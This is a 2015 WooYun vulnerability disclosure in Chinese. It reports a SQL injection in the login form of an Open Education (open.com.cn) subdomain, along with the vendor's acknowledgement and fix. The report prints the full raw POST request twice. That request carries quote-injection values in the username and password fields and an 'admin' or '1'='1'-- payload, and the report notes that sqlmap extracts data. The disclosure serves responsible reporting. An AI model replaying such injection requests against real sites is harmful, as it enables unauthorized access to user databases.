当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145908

漏洞标题:奥鹏教育某主站登录导致SQL注入

相关厂商:open.com.cn

漏洞作者: 小菜牛牛

提交时间:2015-10-11 23:12

修复时间:2015-11-10 09:22

公开时间:2015-11-10 09:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-11: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-10: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

最近发现奥鹏教育的站挖洞的人很火,我也来凑个热闹
http://hanbanoa.open.com.cn/Login.aspx
登录 用户名导致POST 注入

详细说明:

OST /Login.aspx HTTP/1.1
Host: hanbanoa.open.com.cn
Proxy-Connection: keep-alive
Content-Length: 678
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://hanbanoa.open.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://hanbanoa.open.com.cn/Login.aspx
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: b_t_s_100004=16092781-5952-42a9-83c3-e608d3578e02; up_first_date=2015-08-30; up_beacon_user_id_100004= b_t_s_100200=594e3550-c7be-48bd-8282-a17e2003fc5c; b_t_s_100201=3da32262-bb9f-4e8c-ac0f-3db523e62d6d; b_t_s_100100=4cf0ee6e-8783-42f6-a373-90710386ad54; b_t_s_100103=5e87d33c-41e1-4110-9aa6-60914c0fa6cd; b_t_s=t241814798967x; up_beacon_user_id_100200= up_beacon_user_id_100201= __utma=238318431.22661185.1441815461.1441815461.1441816034.2; __utmz=238318431.1441816034.2.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; b_t_s_100001=1e438e61-331b-4985-bf39-b9c606606dfe; Hm_lvt_e208d74b7fc93539fb0706a17abb4f67=1440906334,1441817766; b_t_s_100204=9964c247-ca3d-4d72-8b51-c5a875d1b2a9; up_beacon_id_100204=9964c247-ca3d-4d72-8b51-c5a875d1b2a9-1444131812420; up_page_stime_100204=1444131822891; up_beacon_vist_count_100204=6; up_beacon_user_id_100204=; ASP.NET_SessionId=vtj5gpydldpvfmjfbv454brd
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTczODgwNjM5MQ9kFgICAw9kFgICBQ9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAmYPZBYCAgIPZBYCAgEPZBYCZg9kFgYCBQ88KwAGAQAPFgIeBVZhbHVlBRNhZG1pbicgb3IgJzEnPScxJy0tZGQCCQ88KwAGAQAPFgIfAAUTYWRtaW4nIG9yICcxJz0nMSctLWRkAg0PPCsABgEADxYCHwAFBjgyNjk4MmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBRhBU1B4Um91bmRQYW5lbDEkYnRuTG9naW5zFWDeXnnQ5XXoLF6fIC0XK63B3SBx14EauQvnZPKvHw%3D%3D&ASPxRoundPanel1_tbLoginName_Raw=1%27&ASPxRoundPanel1%24tbLoginName=1%27&ASPxRoundPanel1%24tbPassword=1%27&ASPxRoundPanel1_txtCheckCode_Raw=370436&ASPxRoundPanel1%24txtCheckCode=370436&ASPxRoundPanel1%24btnLogin=&DXScript=1_145%2C1_81%2C1_99%2C1_106%2C1_137%2C1_92


利用SQLMAP可以跑出很多东东哦

QQ截图20151010224249.jpg


QQ截图20151010224310.jpg


QQ截图20151010224327.jpg


漏洞证明:

OST /Login.aspx HTTP/1.1
Host: hanbanoa.open.com.cn
Proxy-Connection: keep-alive
Content-Length: 678
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://hanbanoa.open.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://hanbanoa.open.com.cn/Login.aspx
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: b_t_s_100004=16092781-5952-42a9-83c3-e608d3578e02; up_first_date=2015-08-30; up_beacon_user_id_100004= b_t_s_100200=594e3550-c7be-48bd-8282-a17e2003fc5c; b_t_s_100201=3da32262-bb9f-4e8c-ac0f-3db523e62d6d; b_t_s_100100=4cf0ee6e-8783-42f6-a373-90710386ad54; b_t_s_100103=5e87d33c-41e1-4110-9aa6-60914c0fa6cd; b_t_s=t241814798967x; up_beacon_user_id_100200= up_beacon_user_id_100201= __utma=238318431.22661185.1441815461.1441815461.1441816034.2; __utmz=238318431.1441816034.2.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; b_t_s_100001=1e438e61-331b-4985-bf39-b9c606606dfe; Hm_lvt_e208d74b7fc93539fb0706a17abb4f67=1440906334,1441817766; b_t_s_100204=9964c247-ca3d-4d72-8b51-c5a875d1b2a9; up_beacon_id_100204=9964c247-ca3d-4d72-8b51-c5a875d1b2a9-1444131812420; up_page_stime_100204=1444131822891; up_beacon_vist_count_100204=6; up_beacon_user_id_100204=; ASP.NET_SessionId=vtj5gpydldpvfmjfbv454brd
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTczODgwNjM5MQ9kFgICAw9kFgICBQ9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAmYPZBYCAgIPZBYCAgEPZBYCZg9kFgYCBQ88KwAGAQAPFgIeBVZhbHVlBRNhZG1pbicgb3IgJzEnPScxJy0tZGQCCQ88KwAGAQAPFgIfAAUTYWRtaW4nIG9yICcxJz0nMSctLWRkAg0PPCsABgEADxYCHwAFBjgyNjk4MmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBRhBU1B4Um91bmRQYW5lbDEkYnRuTG9naW5zFWDeXnnQ5XXoLF6fIC0XK63B3SBx14EauQvnZPKvHw%3D%3D&ASPxRoundPanel1_tbLoginName_Raw=1%27&ASPxRoundPanel1%24tbLoginName=1%27&ASPxRoundPanel1%24tbPassword=1%27&ASPxRoundPanel1_txtCheckCode_Raw=370436&ASPxRoundPanel1%24txtCheckCode=370436&ASPxRoundPanel1%24btnLogin=&DXScript=1_145%2C1_81%2C1_99%2C1_106%2C1_137%2C1_92


利用SQLMAP可以跑出很多东东哦

QQ截图20151010224249.jpg


QQ截图20151010224310.jpg


QQ截图20151010224327.jpg

修复方案:

你们比我更专业

版权声明:转载请注明来源 小菜牛牛@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-10-12 10:19

厂商回复:

对外测试环境

最新状态:

2015-11-10:已修复